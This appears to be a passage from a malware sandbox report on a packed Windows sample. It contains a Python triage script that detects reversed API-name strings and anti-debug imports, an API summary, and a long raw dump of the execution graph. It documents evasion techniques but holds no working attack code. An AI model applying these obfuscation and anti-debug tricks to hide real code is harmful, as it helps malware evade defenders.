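    "CheckRemoteDebuggerPresent": "anti-debug",
    "IsDebuggerPresent": "anti-debug",
    "FlushInstructionCache": "self-modifying-code",
    "VirtualProtect": "self-modifying-code",
    "GetProcAddress": "dynamic-import",
    "GetModuleHandleA": "dynamic-import",
    "GetModuleHandleW": "dynamic-import",
    "LoadLibraryA": "dynamic-import",
}

# Module names seen next to the API strings; matched case-insensitively
# because the dump mixes "Kernel32", "KernelBase" and "KernelBASE".
MODULE_ALIASES = {"kernel32", "kernelbase"}


@dataclass(frozen=True)
class Resolved:
    raw: str          # token exactly as it appears in the dump
    api: str          # recovered API name
    obfuscation: str  # "plain" or "reversed"
    tag: str


def decode_token(token: str):
    """Return (api_name, obfuscation) if the token encodes a known API, else None."""
    if token in KNOWN_APIS:
        return token, "plain"
    reversed_token = token[::-1]        # e.g. "sserddAcorPteG" -> "GetProcAddress"
    if reversed_token in KNOWN_APIS:
        return reversed_token, "reversed"
    return None


def analyse_string_ids(string_ids):
    """Decode '$'-joined String ID fields from the report into (resolved, modules)."""
    found = []
    modules = set()
    for sid in string_ids:
        for token in sid.split("$"):
            if token.lower() in MODULE_ALIASES:
                modules.add(token.lower())
                continue
            decoded = decode_token(token)
            if decoded is not None:
                api, how = decoded
                found.append(Resolved(token, api, how, TAGS.get(api, "other")))
    return found, modules


def find_reversed_api_strings(blob: bytes, min_len: int = 8):
    """Scan a raw memory dump for reversed ASCII API names.

    Short names are skipped (min_len) because reversed 4-6 byte strings
    collide with ordinary data far too often to be useful as indicators.
    Returns sorted (offset, api_name) pairs.
    """
    hits = []
    for api in sorted(KNOWN_APIS):
        if len(api) < min_len:
            continue
        needle = api[::-1].encode("ascii")
        start = 0
        while (pos := blob.find(needle, start)) != -1:
            hits.append((pos, api))
            start = pos + 1
    return sorted(hits)


# Constructed inputs: the String ID fields shown in the report's function
# blocks, and a small fake dump laid out like the strings the dump contains.
REPORT_STRING_IDS = [
    "Kernel32$WinExec",
    "CheckRemoteDebuggerPresent$KernelBase",
    "FlushInstructionCache$Kernel32",
    "Kernel32$sserddAcorPteG",
    "AeldnaHeludoMteG$KernelBASE",
]
SAMPLE_DUMP = b"\x00\x00Kernel32\x00sserddAcorPteG\x00AeldnaHeludoMteG\x00KernelBASE\x00"


def summarise(string_ids=REPORT_STRING_IDS, blob=SAMPLE_DUMP):
    """Triage summary: which tags are present and whether string reversal was used."""
    found, modules = analyse_string_ids(string_ids)
    return {
        "tags": sorted({r.tag for r in found}),
        "reversed_names": sorted(r.api for r in found if r.obfuscation == "reversed"),
        "modules": sorted(modules),
        "dump_hits": find_reversed_api_strings(blob),
    }


if __name__ == "__main__":
    for key, value in summarise().items():
        print(f"{key}: {value}")
```

The reversed-name scan is deliberately limited to names of eight characters or more and to a fixed API list: reversing arbitrary printable runs and checking them against a full export table produces many accidental matches on short names, so a detection built on this idea should key on the long, distinctive ones (GetProcAddress, GetModuleHandleA, LoadLibraryA) and treat their presence next to a module-name string as the indicator.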

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:5.4%
                                                                                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:1291
                                                                                                                                      Total number of Limit Nodes:53
                                                                                                                                      execution_graph (rendered as an image; the node and edge data of the graph is not reproduced). Windows APIs reachable in the graph, by code region:
                                                                                                                                        • Code outside the image (0x31d7xxxx, 0x3518xxxx): EnumThreadWindows, DuplicateHandle, GetActiveWindow, MessageBoxW, VirtualProtect, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId
                                                                                                                                        • Image at 0x40xxxx, CRT start-up: HeapCreate, GetModuleHandleW, GetCommandLineA, TlsAlloc, TlsSetValue, TlsGetValue, TlsFree, GetStartupInfoA, GetStdHandle, SetHandleCount, GetFileType, InitializeCriticalSectionAndSpinCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, WideCharToMultiByte, GetModuleFileNameA, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, InterlockedIncrement, Sleep, GetLastError, SetLastError, GetCurrentThreadId, WriteFile, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
                                                                                                                                        • Image at 0x40xxxx, from 4019f0: OleInitialize, GetCurrentProcessId, CreateToolhelp32Snapshot, Module32First, Module32Next, CloseHandle, GetModuleHandleA, FindResourceA, LoadResource, LockResource, SizeofResource, FreeResource, LoadLibraryA, GetProcAddress, VariantInit, VariantClear, SafeArrayCreate, SafeArrayAccessData, SafeArrayDestroy, SafeArrayCreateVector
18498->18497 18500 413bcc 18498->18500 18503 4104e9 __decode_pointer 6 API calls 18499->18503 18519 413c53 18499->18519 18504 41046e __encode_pointer 6 API calls 18500->18504 18501 4104e9 __decode_pointer 6 API calls 18501->18497 18502 4104e9 __decode_pointer 6 API calls 18511 413c96 18502->18511 18505 413c46 18503->18505 18506 413bd2 GetProcAddress 18504->18506 18508 4104e9 __decode_pointer 6 API calls 18505->18508 18507 41046e __encode_pointer 6 API calls 18506->18507 18509 413be7 GetProcAddress 18507->18509 18508->18519 18510 41046e __encode_pointer 6 API calls 18509->18510 18512 413bfc GetProcAddress 18510->18512 18514 4104e9 __decode_pointer 6 API calls 18511->18514 18516 413c7e 18511->18516 18513 41046e __encode_pointer 6 API calls 18512->18513 18515 413c11 18513->18515 18514->18516 18515->18499 18517 413c1b GetProcAddress 18515->18517 18516->18501 18518 41046e __encode_pointer 6 API calls 18517->18518 18518->18499 18519->18502 18519->18516 18521 40ba3c __VEC_memzero 18520->18521 18521->18470 18523 40ce11 18522->18523 18524 40ce13 IsDebuggerPresent 18522->18524 18523->18474 18530 4138fc 18524->18530 18527 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 18528 413723 __invoke_watson 18527->18528 18529 41372b GetCurrentProcess TerminateProcess 18527->18529 18528->18529 18529->18474 18530->18527 18532 40e7d7 GetProcAddress 18531->18532 18533 40e7ec ExitProcess 18531->18533 18532->18533 18534 40e7e7 CorExitProcess 18532->18534 18534->18533 18536 40b900 18535->18536 18537 40b85f 18535->18537 18538 40d2e3 _malloc 6 API calls 18536->18538 18544 40b8bc RtlAllocateHeap 18537->18544 18546 40b870 18537->18546 18547 40b8ec 18537->18547 18549 40d2e3 _malloc 6 API calls 18537->18549 18550 40b8f1 18537->18550 18552 40b8f8 18537->18552 18553 40b7fe 18537->18553 18539 40b906 18538->18539 18541 40bfc1 __commit 62 API calls 18539->18541 18540 40ec4d __FF_MSGBANNER 62 API calls 18540->18546 18541->18552 18543 40eaa2 __NMSG_WRITE 62 API calls 18543->18546 18544->18537 
18545 40e7ee _malloc 4 API calls 18545->18546 18546->18537 18546->18540 18546->18543 18546->18545 18548 40bfc1 __commit 62 API calls 18547->18548 18548->18550 18549->18537 18551 40bfc1 __commit 62 API calls 18550->18551 18551->18552 18552->18448 18554 40b80a __commit 18553->18554 18555 40b83b __commit 18554->18555 18556 40d6e0 __lock 63 API calls 18554->18556 18555->18537 18557 40b820 18556->18557 18558 40def2 ___sbh_alloc_block 5 API calls 18557->18558 18559 40b82b 18558->18559 18561 40b844 18559->18561 18564 40d606 LeaveCriticalSection 18561->18564 18563 40b84b 18563->18555 18564->18563 18565->18452 18567 40daa0 HeapAlloc 18566->18567 18568 40da6c HeapReAlloc 18566->18568 18569 40da8a 18567->18569 18571 40dac3 VirtualAlloc 18567->18571 18568->18569 18570 40da8e 18568->18570 18569->18338 18570->18567 18571->18569 18572 40dadd HeapFree 18571->18572 18572->18569 18574 40db20 VirtualAlloc 18573->18574 18576 40db67 18574->18576 18576->18341 18577->18344 18578->18277 18597 40d606 LeaveCriticalSection 18579->18597 18581 41066c 18581->18287 18583 4145f0 InterlockedIncrement 18582->18583 18584 4145f3 18582->18584 18583->18584 18585 414600 18584->18585 18586 4145fd InterlockedIncrement 18584->18586 18587 41460a InterlockedIncrement 18585->18587 18588 41460d 18585->18588 18586->18585 18587->18588 18589 414617 InterlockedIncrement 18588->18589 18590 41461a 18588->18590 18589->18590 18591 414633 InterlockedIncrement 18590->18591 18592 414643 InterlockedIncrement 18590->18592 18593 41464e InterlockedIncrement 18590->18593 18591->18590 18592->18590 18593->18290 18598 40d606 LeaveCriticalSection 18594->18598 18596 4106ba 18596->18292 18597->18581 18598->18596 18599->18086 18602 41265c 18600->18602 18604 4126c9 18602->18604 18610 416836 18602->18610 18603 4127c7 18603->18132 18603->18133 18604->18603 18605 416836 73 API calls _parse_cmdline 18604->18605 18605->18604 18607 414474 18606->18607 18608 41447b 18606->18608 18832 4142d1 18607->18832 18608->18126 18613 4167e3 
18610->18613 18616 40ec86 18613->18616 18617 40ec99 18616->18617 18621 40ece6 18616->18621 18624 410735 18617->18624 18620 40ecc6 18620->18621 18644 413fcc 18620->18644 18621->18602 18625 4106bc __getptd_noexit 63 API calls 18624->18625 18626 41073d 18625->18626 18627 40ec9e 18626->18627 18628 40e79a __amsg_exit 63 API calls 18626->18628 18627->18620 18629 414738 18627->18629 18628->18627 18630 414744 __commit 18629->18630 18631 410735 __getptd 63 API calls 18630->18631 18632 414749 18631->18632 18633 414777 18632->18633 18635 41475b 18632->18635 18634 40d6e0 __lock 63 API calls 18633->18634 18636 41477e 18634->18636 18637 410735 __getptd 63 API calls 18635->18637 18660 4146fa 18636->18660 18640 414760 18637->18640 18642 41476e __commit 18640->18642 18643 40e79a __amsg_exit 63 API calls 18640->18643 18642->18620 18643->18642 18645 413fd8 __commit 18644->18645 18646 410735 __getptd 63 API calls 18645->18646 18647 413fdd 18646->18647 18648 413fef 18647->18648 18649 40d6e0 __lock 63 API calls 18647->18649 18652 413ffd __commit 18648->18652 18656 40e79a __amsg_exit 63 API calls 18648->18656 18650 41400d 18649->18650 18651 414056 18650->18651 18653 414024 InterlockedDecrement 18650->18653 18654 41403e InterlockedIncrement 18650->18654 18828 414067 18651->18828 18652->18621 18653->18654 18657 41402f 18653->18657 18654->18651 18656->18652 18657->18654 18658 40b6b5 type_info::_Type_info_dtor 63 API calls 18657->18658 18659 41403d 18658->18659 18659->18654 18661 4146fe 18660->18661 18667 414730 18660->18667 18662 4145d2 ___addlocaleref 8 API calls 18661->18662 18661->18667 18663 414711 18662->18663 18663->18667 18671 414661 18663->18671 18668 4147a2 18667->18668 18827 40d606 LeaveCriticalSection 18668->18827 18670 4147a9 18670->18640 18672 414672 InterlockedDecrement 18671->18672 18673 4146f5 18671->18673 18674 414687 InterlockedDecrement 18672->18674 18675 41468a 18672->18675 18673->18667 18685 414489 18673->18685 18674->18675 18676 414694 InterlockedDecrement 18675->18676 
18677 414697 18675->18677 18676->18677 18678 4146a1 InterlockedDecrement 18677->18678 18679 4146a4 18677->18679 18678->18679 18680 4146ae InterlockedDecrement 18679->18680 18682 4146b1 18679->18682 18680->18682 18681 4146ca InterlockedDecrement 18681->18682 18682->18681 18683 4146da InterlockedDecrement 18682->18683 18684 4146e5 InterlockedDecrement 18682->18684 18683->18682 18684->18673 18686 41450d 18685->18686 18687 4144a0 18685->18687 18688 41455a 18686->18688 18689 40b6b5 type_info::_Type_info_dtor 63 API calls 18686->18689 18687->18686 18696 40b6b5 type_info::_Type_info_dtor 63 API calls 18687->18696 18698 4144d4 18687->18698 18699 414581 18688->18699 18739 417667 18688->18739 18691 41452e 18689->18691 18693 40b6b5 type_info::_Type_info_dtor 63 API calls 18691->18693 18700 414541 18693->18700 18694 40b6b5 type_info::_Type_info_dtor 63 API calls 18704 414502 18694->18704 18695 4145c6 18705 40b6b5 type_info::_Type_info_dtor 63 API calls 18695->18705 18706 4144c9 18696->18706 18697 40b6b5 type_info::_Type_info_dtor 63 API calls 18697->18699 18701 40b6b5 type_info::_Type_info_dtor 63 API calls 18698->18701 18714 4144f5 18698->18714 18699->18695 18702 40b6b5 63 API calls type_info::_Type_info_dtor 18699->18702 18703 40b6b5 type_info::_Type_info_dtor 63 API calls 18700->18703 18707 4144ea 18701->18707 18702->18699 18708 41454f 18703->18708 18709 40b6b5 type_info::_Type_info_dtor 63 API calls 18704->18709 18710 4145cc 18705->18710 18715 417841 18706->18715 18731 4177fc 18707->18731 18713 40b6b5 type_info::_Type_info_dtor 63 API calls 18708->18713 18709->18686 18710->18667 18713->18688 18714->18694 18716 41784e 18715->18716 18730 4178cb 18715->18730 18717 41785f 18716->18717 18718 40b6b5 type_info::_Type_info_dtor 63 API calls 18716->18718 18719 417871 18717->18719 18720 40b6b5 type_info::_Type_info_dtor 63 API calls 18717->18720 18718->18717 18721 40b6b5 type_info::_Type_info_dtor 63 API calls 18719->18721 18722 417883 18719->18722 18720->18719 18721->18722 18723 
40b6b5 type_info::_Type_info_dtor 63 API calls 18722->18723 18727 417895 18722->18727 18723->18727 18724 40b6b5 type_info::_Type_info_dtor 63 API calls 18725 4178a7 18724->18725 18726 4178b9 18725->18726 18728 40b6b5 type_info::_Type_info_dtor 63 API calls 18725->18728 18729 40b6b5 type_info::_Type_info_dtor 63 API calls 18726->18729 18726->18730 18727->18724 18727->18725 18728->18726 18729->18730 18730->18698 18732 417809 18731->18732 18733 41783d 18731->18733 18734 417819 18732->18734 18735 40b6b5 type_info::_Type_info_dtor 63 API calls 18732->18735 18733->18714 18736 41782b 18734->18736 18737 40b6b5 type_info::_Type_info_dtor 63 API calls 18734->18737 18735->18734 18736->18733 18738 40b6b5 type_info::_Type_info_dtor 63 API calls 18736->18738 18737->18736 18738->18733 18740 417678 18739->18740 18826 41457a 18739->18826 18741 40b6b5 type_info::_Type_info_dtor 63 API calls 18740->18741 18742 417680 18741->18742 18743 40b6b5 type_info::_Type_info_dtor 63 API calls 18742->18743 18744 417688 18743->18744 18745 40b6b5 type_info::_Type_info_dtor 63 API calls 18744->18745 18746 417690 18745->18746 18747 40b6b5 type_info::_Type_info_dtor 63 API calls 18746->18747 18748 417698 18747->18748 18749 40b6b5 type_info::_Type_info_dtor 63 API calls 18748->18749 18750 4176a0 18749->18750 18751 40b6b5 type_info::_Type_info_dtor 63 API calls 18750->18751 18752 4176a8 18751->18752 18753 40b6b5 type_info::_Type_info_dtor 63 API calls 18752->18753 18754 4176af 18753->18754 18755 40b6b5 type_info::_Type_info_dtor 63 API calls 18754->18755 18756 4176b7 18755->18756 18757 40b6b5 type_info::_Type_info_dtor 63 API calls 18756->18757 18758 4176bf 18757->18758 18759 40b6b5 type_info::_Type_info_dtor 63 API calls 18758->18759 18760 4176c7 18759->18760 18761 40b6b5 type_info::_Type_info_dtor 63 API calls 18760->18761 18762 4176cf 18761->18762 18763 40b6b5 type_info::_Type_info_dtor 63 API calls 18762->18763 18764 4176d7 18763->18764 18765 40b6b5 type_info::_Type_info_dtor 63 API calls 
18764->18765 18766 4176df 18765->18766 18767 40b6b5 type_info::_Type_info_dtor 63 API calls 18766->18767 18768 4176e7 18767->18768 18769 40b6b5 type_info::_Type_info_dtor 63 API calls 18768->18769 18770 4176ef 18769->18770 18771 40b6b5 type_info::_Type_info_dtor 63 API calls 18770->18771 18772 4176f7 18771->18772 18773 40b6b5 type_info::_Type_info_dtor 63 API calls 18772->18773 18774 417702 18773->18774 18775 40b6b5 type_info::_Type_info_dtor 63 API calls 18774->18775 18776 41770a 18775->18776 18777 40b6b5 type_info::_Type_info_dtor 63 API calls 18776->18777 18778 417712 18777->18778 18779 40b6b5 type_info::_Type_info_dtor 63 API calls 18778->18779 18780 41771a 18779->18780 18781 40b6b5 type_info::_Type_info_dtor 63 API calls 18780->18781 18782 417722 18781->18782 18783 40b6b5 type_info::_Type_info_dtor 63 API calls 18782->18783 18784 41772a 18783->18784 18785 40b6b5 type_info::_Type_info_dtor 63 API calls 18784->18785 18786 417732 18785->18786 18787 40b6b5 type_info::_Type_info_dtor 63 API calls 18786->18787 18788 41773a 18787->18788 18789 40b6b5 type_info::_Type_info_dtor 63 API calls 18788->18789 18790 417742 18789->18790 18791 40b6b5 type_info::_Type_info_dtor 63 API calls 18790->18791 18792 41774a 18791->18792 18793 40b6b5 type_info::_Type_info_dtor 63 API calls 18792->18793 18794 417752 18793->18794 18795 40b6b5 type_info::_Type_info_dtor 63 API calls 18794->18795 18796 41775a 18795->18796 18797 40b6b5 type_info::_Type_info_dtor 63 API calls 18796->18797 18798 417762 18797->18798 18799 40b6b5 type_info::_Type_info_dtor 63 API calls 18798->18799 18800 41776a 18799->18800 18801 40b6b5 type_info::_Type_info_dtor 63 API calls 18800->18801 18802 417772 18801->18802 18803 40b6b5 type_info::_Type_info_dtor 63 API calls 18802->18803 18804 41777a 18803->18804 18805 40b6b5 type_info::_Type_info_dtor 63 API calls 18804->18805 18806 417788 18805->18806 18807 40b6b5 type_info::_Type_info_dtor 63 API calls 18806->18807 18808 417793 18807->18808 18809 40b6b5 
type_info::_Type_info_dtor 63 API calls 18808->18809 18810 41779e 18809->18810 18811 40b6b5 type_info::_Type_info_dtor 63 API calls 18810->18811 18812 4177a9 18811->18812 18813 40b6b5 type_info::_Type_info_dtor 63 API calls 18812->18813 18814 4177b4 18813->18814 18815 40b6b5 type_info::_Type_info_dtor 63 API calls 18814->18815 18816 4177bf 18815->18816 18817 40b6b5 type_info::_Type_info_dtor 63 API calls 18816->18817 18818 4177ca 18817->18818 18819 40b6b5 type_info::_Type_info_dtor 63 API calls 18818->18819 18820 4177d5 18819->18820 18821 40b6b5 type_info::_Type_info_dtor 63 API calls 18820->18821 18822 4177e0 18821->18822 18823 40b6b5 type_info::_Type_info_dtor 63 API calls 18822->18823 18824 4177eb 18823->18824 18825 40b6b5 type_info::_Type_info_dtor 63 API calls 18824->18825 18825->18826 18826->18697 18827->18670 18831 40d606 LeaveCriticalSection 18828->18831 18830 41406e 18830->18648 18831->18830 18833 4142dd __commit 18832->18833 18834 410735 __getptd 63 API calls 18833->18834 18835 4142e6 18834->18835 18836 413fcc _LocaleUpdate::_LocaleUpdate 65 API calls 18835->18836 18837 4142f0 18836->18837 18863 414070 18837->18863 18840 411c75 __malloc_crt 63 API calls 18841 414311 18840->18841 18842 414430 __commit 18841->18842 18870 4140ec 18841->18870 18842->18608 18845 414341 InterlockedDecrement 18847 414351 18845->18847 18848 414362 InterlockedIncrement 18845->18848 18846 41443d 18846->18842 18850 414450 18846->18850 18851 40b6b5 type_info::_Type_info_dtor 63 API calls 18846->18851 18847->18848 18853 40b6b5 type_info::_Type_info_dtor 63 API calls 18847->18853 18848->18842 18849 414378 18848->18849 18849->18842 18854 40d6e0 __lock 63 API calls 18849->18854 18852 40bfc1 __commit 63 API calls 18850->18852 18851->18850 18852->18842 18855 414361 18853->18855 18857 41438c InterlockedDecrement 18854->18857 18855->18848 18858 414408 18857->18858 18859 41441b InterlockedIncrement 18857->18859 18858->18859 18861 40b6b5 type_info::_Type_info_dtor 63 API calls 18858->18861 
18880 414432 18859->18880 18862 41441a 18861->18862 18862->18859 18864 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 18863->18864 18865 414084 18864->18865 18866 4140ad 18865->18866 18867 41408f GetOEMCP 18865->18867 18868 4140b2 GetACP 18866->18868 18869 41409f 18866->18869 18867->18869 18868->18869 18869->18840 18869->18842 18871 414070 getSystemCP 75 API calls 18870->18871 18872 41410c 18871->18872 18873 414117 setSBCS 18872->18873 18875 41415b IsValidCodePage 18872->18875 18879 414180 _memset __setmbcp_nolock 18872->18879 18874 40ce09 __atodbl_l 5 API calls 18873->18874 18876 4142cf 18874->18876 18875->18873 18877 41416d GetCPInfo 18875->18877 18876->18845 18876->18846 18877->18873 18877->18879 18883 413e39 GetCPInfo 18879->18883 19016 40d606 LeaveCriticalSection 18880->19016 18882 414439 18882->18842 18884 413e6d _memset 18883->18884 18885 413f1f 18883->18885 18893 417625 18884->18893 18888 40ce09 __atodbl_l 5 API calls 18885->18888 18890 413fca 18888->18890 18890->18879 18892 417426 ___crtLCMapStringA 98 API calls 18892->18885 18894 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 18893->18894 18895 417638 18894->18895 18903 41746b 18895->18903 18898 417426 18899 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 18898->18899 18900 417439 18899->18900 18969 417081 18900->18969 18904 4174b7 18903->18904 18905 41748c GetStringTypeW 18903->18905 18906 4174a4 18904->18906 18908 41759e 18904->18908 18905->18906 18907 4174ac GetLastError 18905->18907 18909 4174f0 MultiByteToWideChar 18906->18909 18926 417598 18906->18926 18907->18904 18931 417a20 GetLocaleInfoA 18908->18931 18915 41751d 18909->18915 18909->18926 18911 40ce09 __atodbl_l 5 API calls 18913 413eda 18911->18913 18913->18898 18914 4175ef GetStringTypeA 18918 41760a 18914->18918 18914->18926 18919 417532 _memset ___convertcp 18915->18919 18920 40b84d _malloc 63 API calls 18915->18920 18917 41756b MultiByteToWideChar 18922 417581 GetStringTypeW 18917->18922 18923 417592 18917->18923 18924 40b6b5 
type_info::_Type_info_dtor 63 API calls 18918->18924 18919->18917 18919->18926 18920->18919 18922->18923 18927 4147ae 18923->18927 18924->18926 18926->18911 18928 4147ba 18927->18928 18929 4147cb 18927->18929 18928->18929 18930 40b6b5 type_info::_Type_info_dtor 63 API calls 18928->18930 18929->18926 18930->18929 18932 417a53 18931->18932 18933 417a4e 18931->18933 18962 416f54 18932->18962 18935 40ce09 __atodbl_l 5 API calls 18933->18935 18936 4175c2 18935->18936 18936->18914 18936->18926 18937 417a69 18936->18937 18938 417aa9 GetCPInfo 18937->18938 18942 417b33 18937->18942 18939 417ac0 18938->18939 18940 417b1e MultiByteToWideChar 18938->18940 18939->18940 18943 417ac6 GetCPInfo 18939->18943 18940->18942 18946 417ad9 _strlen 18940->18946 18941 40ce09 __atodbl_l 5 API calls 18945 4175e3 18941->18945 18942->18941 18943->18940 18944 417ad3 18943->18944 18944->18940 18944->18946 18945->18914 18945->18926 18947 40b84d _malloc 63 API calls 18946->18947 18948 417b0b _memset ___convertcp 18946->18948 18947->18948 18948->18942 18949 417b68 MultiByteToWideChar 18948->18949 18950 417b80 18949->18950 18951 417b9f 18949->18951 18953 417ba4 18950->18953 18954 417b87 WideCharToMultiByte 18950->18954 18952 4147ae __freea 63 API calls 18951->18952 18952->18942 18955 417bc3 18953->18955 18956 417baf WideCharToMultiByte 18953->18956 18954->18951 18957 411cba __calloc_crt 63 API calls 18955->18957 18956->18951 18956->18955 18958 417bcb 18957->18958 18958->18951 18959 417bd4 WideCharToMultiByte 18958->18959 18959->18951 18960 417be6 18959->18960 18961 40b6b5 type_info::_Type_info_dtor 63 API calls 18960->18961 18961->18951 18965 41a354 18962->18965 18966 41a36d 18965->18966 18967 41a125 strtoxl 87 API calls 18966->18967 18968 416f65 18967->18968 18968->18933 18970 4170a2 LCMapStringW 18969->18970 18974 4170bd 18969->18974 18971 4170c5 GetLastError 18970->18971 18970->18974 18971->18974 18972 4172bb 18977 417a20 ___ansicp 87 API calls 18972->18977 18973 417117 18975 4172b2 18973->18975 
18976 417130 MultiByteToWideChar 18973->18976 18974->18972 18974->18973 18978 40ce09 __atodbl_l 5 API calls 18975->18978 18976->18975 18984 41715d 18976->18984 18979 4172e3 18977->18979 18980 413efa 18978->18980 18979->18975 18981 4173d7 LCMapStringA 18979->18981 18982 4172fc 18979->18982 18980->18892 19015 417333 18981->19015 18985 417a69 ___convertcp 70 API calls 18982->18985 18983 4171ae MultiByteToWideChar 18986 4171c7 LCMapStringW 18983->18986 19012 4172a9 18983->19012 18988 40b84d _malloc 63 API calls 18984->18988 18995 417176 ___convertcp 18984->18995 18989 41730e 18985->18989 18991 4171e8 18986->18991 18986->19012 18987 4173fe 18987->18975 18996 40b6b5 type_info::_Type_info_dtor 63 API calls 18987->18996 18988->18995 18989->18975 18993 417318 LCMapStringA 18989->18993 18990 4147ae __freea 63 API calls 18990->18975 18994 4171f1 18991->18994 18997 41721a 18991->18997 18992 40b6b5 type_info::_Type_info_dtor 63 API calls 18992->18987 18998 41733a 18993->18998 18993->19015 18999 417203 LCMapStringW 18994->18999 18994->19012 18995->18975 18995->18983 18996->18975 19002 40b84d _malloc 63 API calls 18997->19002 19007 417235 ___convertcp 18997->19007 19000 41734b _memset ___convertcp 18998->19000 19003 40b84d _malloc 63 API calls 18998->19003 18999->19012 19006 417389 LCMapStringA 19000->19006 19000->19015 19001 417269 LCMapStringW 19004 417281 WideCharToMultiByte 19001->19004 19005 4172a3 19001->19005 19002->19007 19003->19000 19004->19005 19008 4147ae __freea 63 API calls 19005->19008 19009 4173a5 19006->19009 19010 4173a9 19006->19010 19007->19001 19007->19012 19008->19012 19014 4147ae __freea 63 API calls 19009->19014 19013 417a69 ___convertcp 70 API calls 19010->19013 19012->18990 19013->19009 19014->19015 19015->18987 19015->18992 19016->18882 19018 41358c 19017->19018 19019 41046e __encode_pointer 6 API calls 19018->19019 19020 4135a4 19018->19020 19019->19018 19020->18156 19024 40d281 19021->19024 19023 40d2ca 19023->18158 19025 40d28d __commit 19024->19025 
19032 40e806 19025->19032 19031 40d2ae __commit 19031->19023 19033 40d6e0 __lock 63 API calls 19032->19033 19034 40d292 19033->19034 19035 40d196 19034->19035 19036 4104e9 __decode_pointer 6 API calls 19035->19036 19037 40d1aa 19036->19037 19038 4104e9 __decode_pointer 6 API calls 19037->19038 19039 40d1ba 19038->19039 19049 40d23d 19039->19049 19055 40e56a 19039->19055 19041 40d224 19042 41046e __encode_pointer 6 API calls 19041->19042 19043 40d232 19042->19043 19046 41046e __encode_pointer 6 API calls 19043->19046 19044 40d1fc 19048 411d06 __realloc_crt 73 API calls 19044->19048 19044->19049 19050 40d212 19044->19050 19045 40d1d8 19045->19041 19045->19044 19068 411d06 19045->19068 19046->19049 19048->19050 19052 40d2b7 19049->19052 19050->19049 19051 41046e __encode_pointer 6 API calls 19050->19051 19051->19041 19117 40e80f 19052->19117 19056 40e576 __commit 19055->19056 19057 40e5a3 19056->19057 19058 40e586 19056->19058 19060 40e5e4 HeapSize 19057->19060 19063 40d6e0 __lock 63 API calls 19057->19063 19059 40bfc1 __commit 63 API calls 19058->19059 19062 40e58b 19059->19062 19061 40e59b __commit 19060->19061 19061->19045 19064 40e744 __commit 6 API calls 19062->19064 19065 40e5b3 ___sbh_find_block 19063->19065 19064->19061 19073 40e604 19065->19073 19070 411d0f 19068->19070 19071 411d4e 19070->19071 19072 411d2f Sleep 19070->19072 19077 40e34f 19070->19077 19071->19044 19072->19070 19076 40d606 LeaveCriticalSection 19073->19076 19075 40e5df 19075->19060 19075->19061 19076->19075 19078 40e35b __commit 19077->19078 19079 40e370 19078->19079 19080 40e362 19078->19080 19081 40e383 19079->19081 19082 40e377 19079->19082 19083 40b84d _malloc 63 API calls 19080->19083 19090 40e4f5 19081->19090 19111 40e390 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 19081->19111 19084 40b6b5 type_info::_Type_info_dtor 63 API calls 19082->19084 19110 40e36a __commit _realloc 19083->19110 19084->19110 19085 40e528 19086 40d2e3 _malloc 6 API calls 19085->19086 19089 
40e52e 19086->19089 19087 40d6e0 __lock 63 API calls 19087->19111 19088 40e4fa HeapReAlloc 19088->19090 19088->19110 19092 40bfc1 __commit 63 API calls 19089->19092 19090->19085 19090->19088 19091 40e54c 19090->19091 19093 40d2e3 _malloc 6 API calls 19090->19093 19095 40e542 19090->19095 19094 40bfc1 __commit 63 API calls 19091->19094 19091->19110 19092->19110 19093->19090 19096 40e555 GetLastError 19094->19096 19098 40bfc1 __commit 63 API calls 19095->19098 19096->19110 19099 40e4c3 19098->19099 19101 40e4c8 GetLastError 19099->19101 19099->19110 19100 40e41b HeapAlloc 19100->19111 19101->19110 19102 40e470 HeapReAlloc 19102->19111 19103 40def2 ___sbh_alloc_block 5 API calls 19103->19111 19104 40e4db 19106 40bfc1 __commit 63 API calls 19104->19106 19104->19110 19105 40d2e3 _malloc 6 API calls 19105->19111 19108 40e4e8 19106->19108 19107 40e4be 19109 40bfc1 __commit 63 API calls 19107->19109 19108->19096 19108->19110 19109->19099 19110->19070 19111->19085 19111->19087 19111->19100 19111->19102 19111->19103 19111->19104 19111->19105 19111->19107 19111->19110 19112 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 19111->19112 19113 40e493 19111->19113 19112->19111 19116 40d606 LeaveCriticalSection 19113->19116 19115 40e49a 19115->19111 19116->19115 19120 40d606 LeaveCriticalSection 19117->19120 19119 40d2bc 19119->19031 19120->19119 19124 40b9aa __commit _strnlen 19121->19124 19122 40b9b8 19123 40bfc1 __commit 63 API calls 19122->19123 19125 40b9bd 19123->19125 19124->19122 19127 40b9ec 19124->19127 19126 40e744 __commit 6 API calls 19125->19126 19131 40b9cd __commit 19126->19131 19128 40d6e0 __lock 63 API calls 19127->19128 19129 40b9f3 19128->19129 19178 40b917 19129->19178 19131->18162 19135 4017cc ___crtGetEnvironmentStringsA 19134->19135 19135->18166 19138 40af70 19136->19138 19137 40b84d _malloc 63 API calls 19137->19138 19138->19137 19139 40af8a 19138->19139 19140 40d2e3 _malloc 6 API calls 19138->19140 19143 40af8c 
